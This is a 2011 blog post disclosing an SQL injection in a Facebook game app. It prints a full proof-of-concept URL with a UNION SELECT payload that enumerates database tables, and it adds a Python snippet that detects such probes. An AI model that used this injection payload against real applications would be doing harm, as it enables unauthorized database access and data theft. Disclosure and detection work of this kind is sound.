Monday, March 21, 2011

Another vulnerability in Facebook apps!

This is the second SQL injection we found in Facebook apps.

We tried to contact the developers but got no response from them. So we decided to release the vulnerability.

Note: There are a few more Facebook apps which we found to be vulnerable to SQL injection attacks. We are waiting for the developers to patch those. We will post them as soon as they are patched.

A proof of concept of the vulnerability can be seen at:

http://apps.facebook.com/lucygames/game.php?gameid=-123%20UNION%20SELECT%20null,%28select%20concat%280x3a,unhex%28Hex%28cast%28group_concat%28table_name%29%20as%20char%29%29%29,0x3a%29%20FROM%20information_schema.tables%20Where%20table_schema=0x6C75637967616D6573%29,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--
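A defensive check for requests like the one above, as an added example that is not part of the original post: it percent-decodes the `gameid` parameter of a request URL and flags any value that is not a plain integer. The function name `check_gameid`, the sample URLs and the assumption that game IDs are non-negative integers are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# SQL keywords that appear in the proof-of-concept request above (case-insensitive).
SQL_TOKENS = re.compile(
    r"\b(union|select|information_schema|group_concat|concat|unhex)\b", re.I
)
# Assumption: a legitimate game ID is a short, non-negative decimal integer.
INTEGER = re.compile(r"[0-9]{1,10}")


def check_gameid(url, param="gameid"):
    """Classify the integer parameter of a request URL.

    Returns (verdict, tokens) where verdict is one of
    'ok', 'missing', 'malformed' or 'sqli-suspect'.
    """
    # parse_qs percent-decodes values, so %20UNION%20SELECT is seen as text.
    values = parse_qs(urlsplit(url).query, keep_blank_values=True).get(param)
    if not values:
        return "missing", []
    if len(values) > 1:
        return "malformed", []  # duplicated parameter: reject, do not guess
    value = values[0].strip()
    if INTEGER.fullmatch(value):
        return "ok", []
    tokens = sorted({t.lower() for t in SQL_TOKENS.findall(value)})
    return ("sqli-suspect" if tokens else "malformed"), tokens


# Constructed sample requests (not taken from real logs).
SAMPLE_REQUESTS = [
    "/game.php?gameid=123",
    "/game.php?gameid=-123%20UNION%20SELECT%20null,null--",
    "/game.php?gameid=12abc",
    "/game.php",
]

if __name__ == "__main__":
    for request in SAMPLE_REQUESTS:
        print(request, "->", check_gameid(request))
```

The same integer check belongs in the application before the value reaches the database, together with a parameterized query; the log-side version only tells you that someone is probing.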
